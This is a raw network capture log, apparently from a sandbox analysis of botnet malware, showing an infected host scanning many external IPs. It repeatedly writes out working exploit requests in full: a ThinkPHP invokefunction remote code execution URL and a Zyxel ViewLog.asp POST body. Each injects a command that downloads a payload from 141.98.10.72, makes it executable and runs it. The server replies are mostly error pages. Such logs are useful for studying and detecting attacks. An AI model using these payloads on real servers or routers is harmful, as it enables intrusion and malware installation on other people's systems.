Feb 14, 2024 09:29:42.968642950 CET	1286	IN	Data Raw: 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 Data Ascii: Nlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA
Feb 14, 2024 09:29:42.968678951 CET	1145	IN	Data Raw: 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 Data Ascii: Hsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGc
Feb 14, 2024 09:29:42.969188929 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to hdr.v-tek.fi's <a href="mailto:jvieno@gmail.com?su
Feb 14, 2024 09:29:42.969224930 CET	338	IN	Data Raw: 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: ogolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPanel, Inc.</

Session ID	Source IP	Source Port	Destination IP	Destination Port
353	192.168.2.15	34422	95.217.25.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:42.750446081 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:42.982604980 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 14 Feb 2024 08:29:42 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
354	192.168.2.15	35420	95.66.132.13	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:42.765275955 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:43.009756088 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:43 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
355	192.168.2.15	51742	95.58.194.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:42.806195974 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:44.281685114 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:46.009643078 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:49.593530893 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.505330086 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:10.328927994 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:39.256113052 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
356	192.168.2.15	47348	94.125.143.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:43.966398954 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
357	192.168.2.15	43380	94.123.131.15	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.023224115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
358	192.168.2.15	54260	94.123.151.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.023293972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
359	192.168.2.15	42180	94.120.149.151	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.023361921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
360	192.168.2.15	50488	31.200.53.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.023413897 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
361	192.168.2.15	46416	94.123.131.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.023489952 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
362	192.168.2.15	33708	95.86.98.62	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.023530960 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
363	192.168.2.15	60950	62.33.133.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.092219114 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:45.753789902 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.082366943 CET	351	IN	HTTP/1.1 404 Not Found Server: nginx/1.0.15 Date: Wed, 14 Feb 2024 08:29:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 169 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
364	192.168.2.15	43058	62.204.94.170	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.162647963 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.359657049 CET	697	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:44 GMT Server: Apache/2.4.56 (Debian) Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow X-XSS-Protection: 1; mode=block Content-Length: 304 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
365	192.168.2.15	55270	31.20.82.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.178006887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.386367083 CET	701	IN	HTTP/1.0 404 Not Found !!! Pragma: no-cache Content-type: text/html WWW-Authenticate: /cgi-bin/ViewLog.asp Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 63 65 6e 74 65 72 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 31 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 30 30 30 30 41 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 66 61 63 65 3d 22 41 72 69 61 6c 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 21 21 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 67 63 6f 6c 6f 72 3d 22 23 46 33 46 33 46 33 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 22 23 30 30 30 30 38 30 22 20 62 6f 72 64 65 72 63 6f 6c 6f 72 64 61 72 6b 3d 22 23 30 30 30 30 38 30 22 3e 0a 20 20 20 20 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 54 69 6d 65 73 20 4e 65 77 20 52 6f 6d 61 69 6e 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
366	192.168.2.15	52734	31.136.250.195	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:44.226231098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:44.857676983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.105642080 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
